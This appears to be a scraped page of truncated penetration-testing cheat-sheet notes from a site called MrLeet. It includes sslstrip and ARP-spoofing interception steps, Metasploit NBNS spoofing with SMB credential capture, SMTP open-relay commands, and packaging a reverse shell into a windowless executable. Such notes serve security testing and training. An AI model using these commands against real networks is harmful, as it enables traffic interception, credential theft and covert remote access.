Latest notes for PenTesting - MrLeet


MrLeet provides materials allowing anyone to gain practical hands-on experience with digital security, computer applications and network administration tasks.
By: ajayverma 2019-06-25 11:35:35

1) Flip your machine into forwarding mode (as root):
echo "1" > /proc/sys/net/ipv4/ip_forward

2) Setup iptables to intercept HTTP requests (as root):
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080

3) sslstrip.py -l 8080 -f lock.ico

4) Run arpspoof to redirect traffic to your machine (as...


Score: 0

By: ajayverma 2019-06-25 11:35:38

[+] SMTP Open Relay Commands

[-] ncat -C 86.54.23.178 25
[-] HELO mail.co.uk
[-] MAIL FROM: <user@mail.co.uk>
[-] RCPT TO: <test@email.com>
[-] DATA
Test Email...


Score: 0

By: ajayverma 2019-06-25 11:35:41

[+] Weak SSH Ciphers

sudo nano /etc/ssh/sshd_config

Add the following lines:

Ciphers aes128-ctr,aes192-ctr,aes256-ctr,arcfour256,arcfour128,arcfour
MACs hmac-sha1,hmac-ripemd160

Restart SSH


[+] Unquoted Service Paths

Run Regedit and browse to HKLM\SYSTEM\CurrentControlSet\services
Find the service in question and simply add &...


Score: 0

By: ajayverma 2019-06-25 11:23:20

[+] NBNS Spoof / Capture

[>] NBNS Spoof
msf > use auxiliary/spoof/nbns/nbns_response
msf auxiliary(nbns_response) > show options
msf auxiliary(nbns_response) > set INTERFACE eth0
msf auxiliary(nbns_response) > set SPOOFIP 10.10.10.10
msf auxiliary(nbns_response) > run

[>] SMB Capture

msf > use auxiliary/server/...


Score: 0

By: ajayverma 2019-06-25 11:23:24

1. NBTSCAN

root@bt:~# nbtscan -r 10.0.2.0/24
Doing NBT name scan for addresses from 10.0.2.0/24

IP address NetBIOS Name Server User MAC address
------------------------------------------------------------------------------
10.0.2.0 Sendto failed: Permission denied
10.0.2.10 <unknown> ...


Score: 0

By: ajayverma 2019-06-25 11:20:34

[+] Reminders

LOG EVERYTHING!

Metasploit - spool /home/<username>/console.log
Linux Terminal - script /home/<username>/Engagements/TestOutput.txt #Type exit to stop

Set IP address
ifconfig eth0 192.168.50.12/24

Set default gateway
route add default gw 192.168.50.9

Set DNS servers
echo "nameserver 192.168.100.2"...


Score: 0

By: ajayverma 2019-06-25 11:20:37

python.exe c:\Python27\PyInstaller-2.1\pyinstaller.py --noconsole --onefile c:\Python27\PyInstaller-2.1\ReverseShell.py

[+] Generate the .spec file.
[+] Windows: (You want a single EXE file with your data in it, hence --onefile).

python pyinstaller.py --onefile your_main_file.py

[+] Rebuild your package.

python pyinstaller.py your_main...


Score: 0

By: ajayverma 2019-06-25 11:20:41

The Checklist

[+] Information Gathering

Manually explore the site
Spider/crawl for missed or hidden content
Check for files that expose content, such as robots.txt, sitemap.xml, .DS_Store
Check the caches of major search engines for publicly accessible sites
Check for differences in content based on User Agent (e.g., mobile sites, access as...


Score: 0

By: ajayverma 2019-06-25 11:20:44

Tools within Kali:

oscanner
root@kali:~# oscanner -s 192.168.1.15 -P 1040

sidguess
root@kali:~# sidguess -i 192.168.1.205 -d /usr/share/wordlists/metasploit/unix_users.txt

tnscmd10g
root@kali:~# tnscmd10g version -h 192.168.1.20

Nmap
nmap -p 1521 -A 192.168.15.205

Nmap nse scripts
Metasploit auxiliaries...


Score: 0

By: ajayverma 2019-06-25 11:20:48

[+] Setting up an Ethernet bridge in Ubuntu/Kali Linux

# Install bridge-utils
sudo apt-get install bridge-utils

# Disable network-manager + firewall

# Configuration

ifconfig
ifconfig eth0 0.0.0.0
ifconfig eth1 0.0.0.0
brctl addbr br0
brctl addif br0 eth0
brctl addif br0 eth1
ifconfig br0 up
dhclient br0

sudo tcpdump -i br0...


Score: 0